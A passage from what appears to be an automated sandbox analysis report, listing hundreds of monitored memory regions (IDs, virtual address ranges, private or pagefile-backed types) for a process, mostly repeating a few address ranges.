1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5367 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5368 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5369 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5370 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5371 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5372 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5373 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5374 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5375 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5376 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5377 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5378 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5379 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5380 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5381 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5382 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5383 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5384 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5385 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5386 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5387 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5388 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5389 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5390 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5391 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5392 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5393 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5394 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5395 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5396 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5397 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5398 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5399 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5400 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5401 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5402 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5403 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5404 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5405 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5406 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5407 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5408 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5409 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5410 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5411 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5412 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5413 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5414 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5415 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5416 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5417 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5418 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5419 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5420 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5421 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5422 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5423 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5424 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5425 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5426 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5427 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5428 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5429 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5430 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 5431 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5432 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5435 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5436 start_va = 0x2360000 end_va = 0x2364fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002360000" filename = "" Region: id = 5438 start_va = 0x2460000 end_va = 0x2475fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002460000" filename = "" Region: id = 5439 start_va = 0x10370000 end_va = 0x103effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010370000" filename = "" Region: id = 5440 start_va = 0x85c0000 end_va = 0x878ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085c0000" filename = "" Region: id = 5441 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5442 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 5443 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5444 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5445 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5446 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5447 start_va = 0x103f0000 end_va = 0x1046ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000103f0000" filename = "" Region: id = 5448 start_va = 0x10470000 end_va = 0x104effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010470000" filename = "" Region: id = 5449 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 5450 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5451 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5452 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5453 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5454 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5455 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5456 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5457 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5458 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5459 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5460 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5461 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5462 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5463 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5464 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5465 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5466 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5467 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5468 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 5469 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 5470 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5471 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5472 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5473 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5474 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5475 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5476 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5477 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5478 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5479 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5480 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5481 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5482 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5483 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5484 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5485 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5486 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5487 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5488 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5489 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5490 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5491 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5492 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5493 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5494 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5495 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5496 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5497 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5498 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5499 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5500 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5501 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5502 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5503 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5504 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5505 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5506 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5507 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5508 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5509 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5510 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5511 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5512 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5513 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5514 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5515 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5516 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5517 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5518 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5519 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5520 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5521 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5522 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5523 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5524 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5525 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5526 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5527 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5528 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5529 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5530 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5531 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5532 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5533 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 5534 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5535 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5536 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5537 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5538 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5539 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5540 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5541 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5542 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5543 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5544 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5545 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5546 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5547 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5548 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5549 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5550 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5551 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5552 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5553 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5554 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5555 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5556 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5557 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5558 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5559 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5560 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5561 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5562 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 